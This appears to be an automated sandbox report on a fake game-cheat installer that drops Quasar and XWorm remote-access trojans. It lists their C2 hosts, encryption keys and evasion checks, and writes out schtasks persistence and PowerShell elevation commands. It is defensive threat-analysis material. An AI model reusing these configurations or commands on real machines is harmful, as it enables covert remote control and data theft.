quasar | 571ddfbe3251be2f3908505e755ebf70dab52fe6bf6cddf875991afa940efaab

Analysis

max time kernel
16s
max time network
65s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
15-03-2023 00:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FenixCheatBETA.exe
Size

25.5MB
MD5

4ffd42d26dc1f942be4154c18ce3be55
SHA1

44dfc8e59cbbdda58d03f81ef4ea57566f528858
SHA256

571ddfbe3251be2f3908505e755ebf70dab52fe6bf6cddf875991afa940efaab
SHA512

d50cfc6b488fb701c643e08a48a9e69af50ab7c6589f2911bb07abf411777d0fb34a136e91f19896b3da518e85c82f2c276c6baffecb3f8d20820a9e2ac6df54
SSDEEP

393216:erES87bfONTU7MEmKbOaVan4W2tlXXQ1K3BflIYGloxEHJy9SN/AjMQ2bgQaQsiB:I8vV7TXSaQZ+cGflUYEWgtQogQaa23W

Score

10^/10

quasar xworm fenixfn office04 evasion rat spyware themida trojan upx

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

Office04

products-behalf.at.ply.gg:6320

Mutex

c23b61cb-eabd-4e27-8555-54877e46a96f

Attributes

encryption_key
46B3B352EE74A03CFD2F29605A3A4FEDFCA67DDD
install_name
Microsoft.exe
log_directory
crashlogs
reconnect_delay
3000
startup_key
Microsoft Windows
subdirectory
Microsoft

Extracted

Family

quasar

Version

1.4.0

Botnet

FenixFN

region-remarks.at.ply.gg:28982

Mutex

d8be406e-39d8-4c7b-9a06-eddd3d2b4731

Attributes

encryption_key
B7C9B35BDD90869A55A0CEF7257C297ED4BAE201
install_name
Dashboard.exe
log_directory
Logs
reconnect_delay
3000
startup_key
System
subdirectory
SubDir

Extracted

Family

xworm

head-transit.at.ply.gg:60611

Mutex

YhEUtVF8wpi4Nt8u

Attributes

install_file
USB.exe

aes.plain

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 9 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\1.exe	family_quasar
C:\Users\Admin\AppData\Roaming\1.exe	family_quasar
C:\Users\Admin\AppData\Roaming\1.exe	family_quasar
behavioral1/memory/404-157-0x00000000006A0000-0x0000000000724000-memory.dmp	family_quasar
behavioral1/memory/3920-219-0x00000000002E0000-0x0000000000B78000-memory.dmp	family_quasar
behavioral1/memory/3920-226-0x00000000002E0000-0x0000000000B78000-memory.dmp	family_quasar
behavioral1/memory/3920-377-0x00000000002E0000-0x0000000000B78000-memory.dmp	family_quasar
behavioral1/memory/4208-403-0x0000000000B50000-0x00000000013E8000-memory.dmp	family_quasar
behavioral1/memory/4208-399-0x0000000000B50000-0x00000000013E8000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

SYSWOW64.exe

description pid process target process

PID 1248 created 2588 1248 SYSWOW64.exe Explorer.EXE
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

description	pid	process	target process
PID 1248 created 2588	1248	SYSWOW64.exe	Explorer.EXE

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

FenixCheat.execmd.exeFenixCheat_Packages.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	FenixCheat.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cmd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	FenixCheat_Packages.exe

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

FenixCheat_Packages.exeFenixCheat.execmd.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	FenixCheat_Packages.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	FenixCheat.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	FenixCheat.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cmd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cmd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	FenixCheat_Packages.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

FenixCheatBETA.exeFenixCheatBETA.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	FenixCheatBETA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	FenixCheatBETA.exe

Executes dropped EXE 8 IoCs

Processes:

FenixCheatBETA.exe1.exeFenixCheat.exeSYSWOW64.exeFenixCheat_Packages.execmd.exeFenixCheatPACKAGES.exeFenixCheatLoader.exe

pid	process
3784	FenixCheatBETA.exe
404	1.exe
3920	FenixCheat.exe
1248	SYSWOW64.exe
2164	FenixCheat_Packages.exe
3156	cmd.exe
1164	FenixCheatPACKAGES.exe
4796	FenixCheatLoader.exe

Themida packer 39 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\FenixCheat.exe	themida
C:\Users\Admin\AppData\Roaming\FenixCheat.exe	themida
C:\Users\Admin\AppData\Roaming\FenixCheat_Packages.exe	themida
C:\Users\Admin\AppData\Roaming\Roblox Player.exe	themida
C:\Users\Admin\AppData\Roaming\Roblox Player.exe	themida
behavioral1/memory/2164-208-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
behavioral1/memory/3920-219-0x00000000002E0000-0x0000000000B78000-memory.dmp	themida
behavioral1/memory/3920-226-0x00000000002E0000-0x0000000000B78000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Roblox Player.exe	themida
C:\Users\Admin\AppData\Roaming\FenixCheat_Packages.exe	themida
C:\Users\Admin\AppData\Roaming\FenixCheat_Packages.exe	themida
behavioral1/memory/2164-261-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
behavioral1/memory/2164-264-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
behavioral1/memory/2164-265-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
behavioral1/memory/2164-267-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
behavioral1/memory/2164-268-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
behavioral1/memory/2164-271-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\FenixCheat.exe	themida
C:\Users\Admin\AppData\Roaming\FenixCheat_Packages.exe	themida
behavioral1/memory/2164-369-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\SubDir\Dashboard.exe	themida
behavioral1/memory/3920-377-0x00000000002E0000-0x0000000000B78000-memory.dmp	themida
behavioral1/memory/3876-376-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
behavioral1/memory/3156-380-0x0000000000610000-0x0000000000E3A000-memory.dmp	themida
behavioral1/memory/4208-403-0x0000000000B50000-0x00000000013E8000-memory.dmp	themida
behavioral1/memory/4208-399-0x0000000000B50000-0x00000000013E8000-memory.dmp	themida
behavioral1/memory/2164-398-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
behavioral1/memory/2164-476-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
behavioral1/memory/3876-498-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
behavioral1/memory/2164-500-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
behavioral1/memory/3876-530-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
behavioral1/memory/3876-536-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
behavioral1/memory/3876-538-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
behavioral1/memory/3876-540-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
behavioral1/memory/3876-557-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
behavioral1/memory/3876-554-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
behavioral1/memory/3876-559-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
behavioral1/memory/3876-671-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida
behavioral1/memory/3876-773-0x00007FF78DF10000-0x00007FF78E823000-memory.dmp	themida

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI21642\python310.dll	upx
behavioral1/memory/3876-584-0x00007FFFDADE0000-0x00007FFFDB24E000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\pythoncom310.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\_uuid.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\_uuid.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\pythoncom310.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\win32api.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\win32api.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\pywintypes310.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\pywintypes310.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\select.pyd	upx
behavioral1/memory/3876-616-0x00007FFFE20D0000-0x00007FFFE20F4000-memory.dmp	upx
behavioral1/memory/3876-617-0x00007FFFE6730000-0x00007FFFE673F000-memory.dmp	upx
behavioral1/memory/3876-619-0x00007FFFE20B0000-0x00007FFFE20C9000-memory.dmp	upx
behavioral1/memory/3876-621-0x00007FFFE0730000-0x00007FFFE075F000-memory.dmp	upx
behavioral1/memory/3876-628-0x00007FFFE06D0000-0x00007FFFE06FC000-memory.dmp	upx
behavioral1/memory/3876-627-0x00007FFFE0700000-0x00007FFFE072D000-memory.dmp	upx
behavioral1/memory/3876-623-0x00007FFFE2000000-0x00007FFFE2019000-memory.dmp	upx
behavioral1/memory/3876-620-0x00007FFFE23A0000-0x00007FFFE23AD000-memory.dmp	upx
behavioral1/memory/3876-633-0x00007FFFDE170000-0x00007FFFDE231000-memory.dmp	upx
behavioral1/memory/3876-634-0x00007FFFE0EA0000-0x00007FFFE0EAA000-memory.dmp	upx
behavioral1/memory/3876-635-0x00007FFFDF4D0000-0x00007FFFDF4EC000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\libffi-7.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\libffi-7.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\_ctypes.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\_ctypes.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI21642\python310.dll	upx
behavioral1/memory/3876-672-0x00007FFFDADE0000-0x00007FFFDB24E000-memory.dmp	upx
behavioral1/memory/3876-682-0x00007FFFE20D0000-0x00007FFFE20F4000-memory.dmp	upx
behavioral1/memory/3876-695-0x00007FFFE0730000-0x00007FFFE075F000-memory.dmp	upx
behavioral1/memory/3876-747-0x00007FFFDE170000-0x00007FFFDE231000-memory.dmp	upx
behavioral1/memory/3876-765-0x00007FFFDF4A0000-0x00007FFFDF4CE000-memory.dmp	upx
behavioral1/memory/3876-766-0x00007FFFDAD20000-0x00007FFFDADD8000-memory.dmp	upx
behavioral1/memory/3876-767-0x00007FFFDA9A0000-0x00007FFFDAD15000-memory.dmp	upx
behavioral1/memory/3876-774-0x00007FFFDF3A0000-0x00007FFFDF3BF000-memory.dmp	upx
behavioral1/memory/3876-775-0x00007FFFCCE90000-0x00007FFFCD001000-memory.dmp	upx
behavioral1/memory/3876-777-0x00007FFFE0920000-0x00007FFFE092B000-memory.dmp	upx
behavioral1/memory/3876-781-0x00007FFFDF440000-0x00007FFFDF44C000-memory.dmp	upx
behavioral1/memory/3876-779-0x00007FFFDF950000-0x00007FFFDF95B000-memory.dmp	upx
behavioral1/memory/3876-780-0x00007FFFE6730000-0x00007FFFE673F000-memory.dmp	upx
behavioral1/memory/3876-782-0x00007FFFE20B0000-0x00007FFFE20C9000-memory.dmp	upx
behavioral1/memory/3876-784-0x00007FFFE23A0000-0x00007FFFE23AD000-memory.dmp	upx
behavioral1/memory/3876-785-0x00007FFFDE110000-0x00007FFFDE11C000-memory.dmp	upx
behavioral1/memory/3876-787-0x00007FFFDE100000-0x00007FFFDE10B000-memory.dmp	upx
behavioral1/memory/3876-788-0x00007FFFE2000000-0x00007FFFE2019000-memory.dmp	upx
behavioral1/memory/3876-791-0x00007FFFDE0E0000-0x00007FFFDE0ED000-memory.dmp	upx
behavioral1/memory/3876-792-0x00007FFFE06D0000-0x00007FFFE06FC000-memory.dmp	upx
behavioral1/memory/3876-794-0x00007FFFDA590000-0x00007FFFDA59E000-memory.dmp	upx
behavioral1/memory/3876-796-0x00007FFFDA580000-0x00007FFFDA58C000-memory.dmp	upx
behavioral1/memory/3876-795-0x00007FFFE0EA0000-0x00007FFFE0EAA000-memory.dmp	upx
behavioral1/memory/3876-793-0x00007FFFDE170000-0x00007FFFDE231000-memory.dmp	upx
behavioral1/memory/3876-790-0x00007FFFE0700000-0x00007FFFE072D000-memory.dmp	upx
behavioral1/memory/3876-789-0x00007FFFDE0F0000-0x00007FFFDE0FC000-memory.dmp	upx
behavioral1/memory/3876-786-0x00007FFFE0730000-0x00007FFFE075F000-memory.dmp	upx
behavioral1/memory/3876-783-0x00007FFFDF370000-0x00007FFFDF37B000-memory.dmp	upx
behavioral1/memory/3876-778-0x00007FFFE20D0000-0x00007FFFE20F4000-memory.dmp	upx
behavioral1/memory/3876-776-0x00007FFFDADE0000-0x00007FFFDB24E000-memory.dmp	upx

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

FenixCheat.execmd.exeFenixCheat_Packages.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	FenixCheat.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	FenixCheat_Packages.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

65 api.ipify.org
66 api.ipify.org
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

FenixCheat.execmd.exeFenixCheat_Packages.exe

pid process

3920 FenixCheat.exe
3156 cmd.exe
2164 FenixCheat_Packages.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

2584 schtasks.exe
1484 schtasks.exe
4396 schtasks.exe
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

1556 bitsadmin.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

SYSWOW64.exepowershell.exe

pid process

1248 SYSWOW64.exe
1248 SYSWOW64.exe
5028
5028
5028
3424 powershell.exe
3424 powershell.exe

flow	ioc
65	api.ipify.org
66	api.ipify.org

pid	process
3920	FenixCheat.exe
3156	cmd.exe
2164	FenixCheat_Packages.exe

pid	process
2584	schtasks.exe
1484	schtasks.exe
4396	schtasks.exe

pid	process
1556	bitsadmin.exe

pid	process
1248	SYSWOW64.exe
1248	SYSWOW64.exe
5028
5028
5028
3424	powershell.exe
3424	powershell.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

1.exeFenixCheat.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	404	1.exe
Token: SeDebugPrivilege	5028
Token: SeDebugPrivilege	3920	FenixCheat.exe
Token: SeDebugPrivilege	3424	powershell.exe
Token: SeIncreaseQuotaPrivilege	5028
Token: SeSecurityPrivilege	5028
Token: SeTakeOwnershipPrivilege	5028
Token: SeLoadDriverPrivilege	5028
Token: SeSystemProfilePrivilege	5028
Token: SeSystemtimePrivilege	5028
Token: SeProfSingleProcessPrivilege	5028
Token: SeIncBasePriorityPrivilege	5028
Token: SeCreatePagefilePrivilege	5028
Token: SeBackupPrivilege	5028
Token: SeRestorePrivilege	5028
Token: SeShutdownPrivilege	5028
Token: SeDebugPrivilege	5028
Token: SeSystemEnvironmentPrivilege	5028
Token: SeRemoteShutdownPrivilege	5028
Token: SeUndockPrivilege	5028
Token: SeManageVolumePrivilege	5028
Token: 33	5028
Token: 34	5028
Token: 35	5028
Token: 36	5028

Suspicious use of WriteProcessMemory 34 IoCs

Processes:

FenixCheatBETA.exeFenixCheatBETA.exe1.exeFenixCheatPACKAGES.exeFenixCheatLoader.execmd.execmd.exe

description	pid	process	target process
PID 216 wrote to memory of 3784	216	FenixCheatBETA.exe	FenixCheatBETA.exe
PID 216 wrote to memory of 3784	216	FenixCheatBETA.exe	FenixCheatBETA.exe
PID 216 wrote to memory of 404	216	FenixCheatBETA.exe	1.exe
PID 216 wrote to memory of 404	216	FenixCheatBETA.exe	1.exe
PID 3784 wrote to memory of 3920	3784	FenixCheatBETA.exe	FenixCheat.exe
PID 3784 wrote to memory of 3920	3784	FenixCheatBETA.exe	FenixCheat.exe
PID 3784 wrote to memory of 3920	3784	FenixCheatBETA.exe	FenixCheat.exe
PID 3784 wrote to memory of 1248	3784	FenixCheatBETA.exe	SYSWOW64.exe
PID 3784 wrote to memory of 1248	3784	FenixCheatBETA.exe	SYSWOW64.exe
PID 3784 wrote to memory of 2164	3784	FenixCheatBETA.exe	FenixCheat_Packages.exe
PID 3784 wrote to memory of 2164	3784	FenixCheatBETA.exe	FenixCheat_Packages.exe
PID 3784 wrote to memory of 3156	3784	FenixCheatBETA.exe	Roblox Player.exe
PID 3784 wrote to memory of 3156	3784	FenixCheatBETA.exe	Roblox Player.exe
PID 3784 wrote to memory of 3156	3784	FenixCheatBETA.exe	Roblox Player.exe
PID 3784 wrote to memory of 4796	3784	FenixCheatBETA.exe	FenixCheatLoader.exe
PID 3784 wrote to memory of 4796	3784	FenixCheatBETA.exe	FenixCheatLoader.exe
PID 3784 wrote to memory of 4796	3784	FenixCheatBETA.exe	FenixCheatLoader.exe
PID 3784 wrote to memory of 1164	3784	FenixCheatBETA.exe	FenixCheatPACKAGES.exe
PID 3784 wrote to memory of 1164	3784	FenixCheatBETA.exe	FenixCheatPACKAGES.exe
PID 3784 wrote to memory of 1164	3784	FenixCheatBETA.exe	FenixCheatPACKAGES.exe
PID 404 wrote to memory of 4396	404	1.exe	schtasks.exe
PID 404 wrote to memory of 4396	404	1.exe	schtasks.exe
PID 1164 wrote to memory of 4556	1164	FenixCheatPACKAGES.exe	cmd.exe
PID 1164 wrote to memory of 4556	1164	FenixCheatPACKAGES.exe	cmd.exe
PID 4796 wrote to memory of 864	4796	FenixCheatLoader.exe	cmd.exe
PID 4796 wrote to memory of 864	4796	FenixCheatLoader.exe	cmd.exe
PID 4796 wrote to memory of 864	4796	FenixCheatLoader.exe	cmd.exe
PID 4556 wrote to memory of 1736	4556	cmd.exe	cacls.exe
PID 4556 wrote to memory of 1736	4556	cmd.exe	cacls.exe
PID 864 wrote to memory of 3424	864	cmd.exe	powershell.exe
PID 864 wrote to memory of 3424	864	cmd.exe	powershell.exe
PID 864 wrote to memory of 3424	864	cmd.exe	powershell.exe
PID 4556 wrote to memory of 768	4556	cmd.exe	wscript.exe
PID 4556 wrote to memory of 768	4556	cmd.exe	wscript.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:2588

C:\Users\Admin\AppData\Local\Temp\FenixCheatBETA.exe
"C:\Users\Admin\AppData\Local\Temp\FenixCheatBETA.exe"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:216

C:\Users\Admin\AppData\Roaming\FenixCheatBETA.exe
"C:\Users\Admin\AppData\Roaming\FenixCheatBETA.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3784

C:\Users\Admin\AppData\Roaming\FenixCheat.exe
"C:\Users\Admin\AppData\Roaming\FenixCheat.exe"
4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3920

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "System" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\FenixCheat.exe" /rl HIGHEST /f
5⤵
- Creates scheduled task(s)
PID:2584

C:\Users\Admin\AppData\Roaming\SubDir\Dashboard.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Dashboard.exe"
5⤵
PID:4208

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "System" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Dashboard.exe" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1484

C:\Users\Admin\AppData\Roaming\SYSWOW64.exe
"C:\Users\Admin\AppData\Roaming\SYSWOW64.exe"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1248

C:\Users\Admin\AppData\Roaming\FenixCheat_Packages.exe
"C:\Users\Admin\AppData\Roaming\FenixCheat_Packages.exe"
4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2164

C:\Users\Admin\AppData\Roaming\FenixCheat_Packages.exe
"C:\Users\Admin\AppData\Roaming\FenixCheat_Packages.exe"
5⤵
PID:3876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
6⤵
PID:2028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
6⤵
PID:2028

C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
7⤵
PID:5180

C:\Users\Admin\AppData\Roaming\FenixCheatLoader.exe
"C:\Users\Admin\AppData\Roaming\FenixCheatLoader.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4796

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B6D1.tmp\B6D2.tmp\B6E3.bat C:\Users\Admin\AppData\Roaming\FenixCheatLoader.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Start-Process elevated.bat -Verb runas"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3424

C:\Users\Admin\AppData\Roaming\FenixCheatPACKAGES.exe
"C:\Users\Admin\AppData\Roaming\FenixCheatPACKAGES.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1164

C:\Users\Admin\AppData\Roaming\Roblox Player.exe
"C:\Users\Admin\AppData\Roaming\Roblox Player.exe"
4⤵
PID:3156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=Roblox Player.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
5⤵
PID:1996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffda5246f8,0x7fffda524708,0x7fffda524718
6⤵
PID:1796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,6440808487723189098,13326827473353574550,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
6⤵
PID:3084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,6440808487723189098,13326827473353574550,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2492 /prefetch:3
6⤵
PID:2340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,6440808487723189098,13326827473353574550,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:8
6⤵
PID:1400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6440808487723189098,13326827473353574550,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
6⤵
PID:5084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6440808487723189098,13326827473353574550,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
6⤵
PID:2364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6440808487723189098,13326827473353574550,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1
6⤵
PID:5500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6440808487723189098,13326827473353574550,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
6⤵
PID:5872

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
